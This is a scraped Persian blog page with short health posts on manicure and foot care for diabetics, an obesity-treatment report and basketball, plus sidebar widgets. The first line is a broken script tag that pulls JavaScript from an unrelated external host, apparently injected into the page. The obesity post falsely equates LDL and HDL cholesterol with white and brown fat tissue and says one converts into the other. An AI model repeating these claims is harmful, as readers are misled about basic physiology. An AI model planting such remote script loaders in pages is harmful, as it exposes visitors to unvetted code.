script type="text/javascript" src="http://7vps.ir/img/website.js"> مانیکور برای دیابتی‌ ها خطر دارد
کافی نت
وبلاگی جذاب

مانیکور برای دیابتی‌ ها خطر دارد
 
 
مانیکور برای دیابتی‌ ها خطر دارد
آیا می دانید مانیکور برای چه کسانی خطرناک است و نباید مانیکور انجام دهند ؟
مانیکور برای دیابتی‌ها خطر دارد
یکی از مشکلاتی که بیماران مبتلا به دیابت با آن دست به گریبان هستند، مسایل و درگیری‌های عروقی است. دیابت، مادر بیماری‌هاست و اگر بیماران مبتلا به دیابت این مسایل و نکات ساده را مدنظر قرار ندهند، باید منتظر دردسرهای ناشی از دیابت باشند...
حتما باید قند خون خود را با دقت كاملا کنترل و مواد غذایی و داروهایی که پزشکتان برای شما تجویز کرده است، مصرف کنید. اگر قندخون بالا باشد، درمان دیابت و حتی بیماری‌های دیگر نیز به تاخیر می‌افتد و تاثیرات داروها مثبت نخواهد بود.
در رژیم غذایی و شیوه زندگی خود تغییرات اساسی ایجاد کنید. هر روز زمانی را برای ورزش در نظر بگیرید و با نظر متخصص تغذیه‌، از رژیم حاوی مواد غنی از انواع ویتامین‌ها و مواد ضروری استفاده کنید.
هنگام گرفتن ناخن‌هایتان دقت کنید آنها را از ته و گوشه نگیرید. این کار را بعد از استحمام انجام دهید که ناخن‌ها و پوست نرم‌تر هستند. مراقب ایجاد زخم در بدن به خصوص نواحی کنار ناخن‌های دست و پایتان باشید. مانیکور و کارهایی از این قبیل که به بافت اطراف ناخن آسیب می‌رساند، ترجیحا انجام نشود.
حتی وقتی در منزل هستید، از دمپایی روفرشی استفاده کنید. دیابت ممکن است عروق و اعصاب پا را تحت فشار قرار دهد و حس آن را کم یا مختل کند. با انجام این اقدام پیشگیرانه، اگر جسم تیزی روی فرش افتاده باشد، پایتان را زخم نخواهد کرد و گرفتاری ایجاد نمی‌کند.
بیرون از منزل کفش مناسب بپوشید. اگر ناخن‌های پایتان بلند است و باعث می‌شود در کفش فشار بیاورد و داخل گوشت فرو رود، کوتاهش کنید. کفش‌های مخصوص بپوشید که فاصله ایمنی مناسب با سطح زمین دارند یا پاشنه شان طوری است که به پا فشار نمی‌آورند.
اگر رنگ ناخن یا انگشت شما تغییر کرد یا حس مورمور و گزگز در انگشت داشتید، حتما با پزشک خود مشورت و با یک جراح عروق مشاوره کنید. گمان نکنید كسانی که با یک سهل‌انگاری، عضوشان سیاه شده، مرده یا حتی آن را از دست داده‌اند، با شما فرق دارند. اجازه ندهید اگر عضو شما سیاه یا خون‌رسانی‌اش مختل شده است، فورا برای قطع آن اقدام شود.
شاید با مشاوره متخصصان عروق بتوان از این کار پیشگیری کرد. اگر سیستم خون‌رسانی پا و انگشت شما اصلاح شود، درمان موثر صورت می?گیرد در غیر این صورت با قطع عضو، مشکل عروقی حل نخواهد شد و به قوت خود باقی خواهد ماند.



 

کشف راهی برای درمان چاقی
 
 
کشف راهی برای درمان چاقی
تحقیق بر روی این درمان ضد چاقی برپایه حضور سلول‌های بنیادی سازنده چربی قهوه ای در داخل چربی سفید انجام می‌شود.
محققان آمریکایی که با دستکاری پروتئینی موفق شدند کلسترول بد را به کلسترول خوب تبدیل کنند امیدوارند که به روشی برای وداع با بیماری چاقی مفرط دست یابند.
به گزارش مهر، کلسترول بد به بافت چربی سفیدی که در اثر مصرف اضافی کالری‌ها نشست می‌کند، گفته می‌شود. این چربی برای تولید انرژی در بدن انسان استفاده نشده و بنابراین در منطقه شکمی ذخیره می‌شود.
این درحالی است که کلسترول خوب ، بافت چربی قهوه ای است که در تولید انرژی استفاده می‌شود سلولهای این بافت میزان مناسبی از کالری را برای تولید انرژی می‌سوزانند.
محققان از مدتها مطالعاتی را بر روی تفاوتهای این دو بافت انجام داده اند و اکنون دانشمندان دانشگاه جان هاپکینز در تحقیقات جدید خود روشی را یافتند که می‌تواند کلسترول بد (LDL ) را به کلسترول خوب (HDL ) تبدیل کند.
  کلسترول؛ خوب، بد یا زشت؟!
این پژوهشگران کشف کردند که با دستکاری و تغییر پروتئین ویژه‌ای به نام نوروپپتید (Y(NYPمی‌توان LDL را به HDL تبدیل کرد. نتایج این کشف که بر روی موش‌ها انجام شده است می‌تواند گامی مهم در یافتن راهی برای درمان کامل چاقی مفرط باشد.
براساس گزارش ساینس اکسپرس، این محققان دریافتند که با حذف بیان نوروپپتید (Y(NYP در هیپوتالاموس پشتی- میانی مغز می‌توان این تبدیل را انجام داد.
تحقیق بر روی این درمان ضد چاقی برپایه حضور سلول‌های بنیادی سازنده چربی قهوه ای در داخل چربی سفید انجام می‌شود.
این درمان فرضی می‌تواند از طریق تزریق سلولهای بنیادی چربی قهوه ای به بافت چربی سفید اجرا شود به روشی که سلول‌های بنیادی چربی قهوه‌ای، چربی سفید را وادار به تغییر کنند.

 



با این ورزش انرژی خود را 2 برابر کنید
 
 
با این ورزش انرژی خود را 2 برابر کنید
 
 
تابستان زمانی مناسب و ایده‌آل برای ورزش كردن در هوای آزاد است و ورزش جدای از تفریح كردن در بهبود سلامت جسم و روان انسان تاثیر بسزایی دارد ...
با ورزش بسكتبال، انرژی خود را افزایش دهید
یكی از ورزش‌های مفیدی كه برای این فصل بسیار مناسب است ورزش بسكتبال است. به گفته كارشناسان ورزش و سلامت در مقاله جدید مجله دی ایج، این ورزش یك بازی رقابتی است كه علاوه بر تحرك زیاد، اعتماد به نفس افراد را نیز افزایش می‌دهد.
ورزش بسكتبال از آنجایی كه تركیبی از انواع حركت‌ها و تمرینات مثل تمرینات كششی، پریدن، خم شدن، دویدن و حركات دیگر است در واقع یك شكل بسیار موثرتر از تمرینات آیروبیك به حساب می‌آید بنابراین تاثیرگذاری آن خیلی بیشتر از ورزش آیروبیك است و به گفته كارشناسان مجموعه‌ای از این تمرینات مفید در افزایش سطح انرژی بدن نقش دارند.



صفحه قبل 1 صفحه بعد

درباره وبلاگ


به وبلاگ خودتان خوش آمدید امیدوارم که در این وبلاگ بتوانم نیاز شما دوست گرامی را برآورده سازم.
آخرین مطالب
آرشيو وبلاگ
نويسندگان
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان کافی نت و آدرس caffinet.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.








نام :
وب :
پیام :
2+2=:
(Refresh)

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 34
بازدید دیروز : 0
بازدید هفته : 126
بازدید ماه : 9158
بازدید کل : 139309
تعداد مطالب : 562
تعداد نظرات : 8
تعداد آنلاین : 1


Alternative content


آریان پیامک
آریان اس ام اس